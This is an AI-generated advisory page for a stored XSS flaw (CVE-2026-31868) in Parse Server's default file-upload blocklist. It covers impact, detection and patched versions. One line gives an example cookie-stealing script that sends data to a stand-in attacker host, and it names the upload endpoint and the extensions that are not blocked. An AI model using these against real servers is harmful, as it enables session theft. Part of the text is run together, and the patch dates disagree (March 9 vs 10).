
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-31868 is a stored Cross-Site Scripting (XSS) vulnerability in Parse Server (npm package parse-server) that allows unauthenticated attackers to upload HTML-renderable files containing malicious code, which executes in victims' browsers under the Parse Server domain. The vulnerability stems from an incomplete blocklist in the default fileUpload.fileExtensions configuration, leaving extensions such as .svgz, .xht, .xml, .xsl, .xslt, and content types application/xhtml+xml and application/xslt+xml unblocked. Affected versions include all releases below 8.6.30 and versions 9.0.0–9.6.0-alpha.3 (inclusive). It was published on March 10, 2026, with patches released the same day. The CVSS v3.1 base score is 6.1 (Medium) and the CVSS v4.0 base score is 6.3 (Medium) (GitHub Advisory, Github Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting): Parse Server's fileUpload.fileExtensions option did not include several HTML-renderable file types in its default blocklist, even though .html, .htm, .shtml, .xhtml, and .svg were already blocked. An attacker can upload a file with an affected extension (e.g., .svgz, .xht, .xml, .xsl, .xslt) or an extensionless file with a content type of application/xhtml+xml or application/xslt+xml containing embedded JavaScript. When a victim's browser navigates to the uploaded file's URL, the browser renders it as an active document and executes the embedded script in the context of the Parse Server domain. No authentication or special privileges are required to upload the file, though user interaction (a victim visiting the URL) is needed for execution (GitHub Advisory, Github Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the Parse Server domain in a victim's browser, enabling session token theft, user redirection, and unauthorized actions performed on behalf of other users. Because the script runs under the Parse Server's origin, it can access cookies and local storage scoped to that domain, potentially compromising authenticated user sessions. Availability is not directly impacted, but confidentiality and integrity of subsequent systems (e.g., user accounts and data accessible via stolen tokens) are rated High under CVSS v4.0 (GitHub Advisory).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the available data. The EPSS score is approximately 0.045–0.064% (roughly the 20th percentile), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been identified (Github Advisory).
payload.svgz, payload.xht, payload.xsl) or an extensionless file with content type application/xhtml+xml, embedding JavaScript (e.g., <script>document.location='https://attacker.com/?c='+document.cookie</script> within valid XML/XHTML markup).POST /1/files/<filename>) without requiring authentication if the server allows public uploads..svgz, .xht, .xml, .xsl, or .xslt files..svgz, .xht, .xml, .xsl, .xslt in the Parse Server file storage directory or object store that contain <script> tags or JavaScript event handlers.POST /1/files/ requests uploading files with the above extensions or with Content-Type: application/xhtml+xml or application/xslt+xml; subsequent GET requests to those file URLs from different IP addresses or user agents (GitHub Advisory).Parse Community released patched versions 8.6.30 (for the Parse Server 8.x branch) and 9.6.0-alpha.4 (for the 9.x branch) on March 9, 2026, which add the missing file extensions and content types to the default fileUpload.fileExtensions blocklist. Operators who cannot immediately upgrade should manually configure the fileUpload.fileExtensions server option to explicitly block .svgz, .xht, .xml, .xsl, .xslt, and the content types application/xhtml+xml and application/xslt+xml. Upgrading to a patched version is the recommended long-term remediation (Parse Server 8.6.30 Release, Parse Server 9.6.0-alpha.4 Release).
The vulnerability was reported and coordinated by maintainer mtrezza of the parse-community organization, who also published the security advisory. No significant independent researcher commentary, media coverage, or notable social media discussion beyond automated CVE tracking feeds has been identified for this vulnerability.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."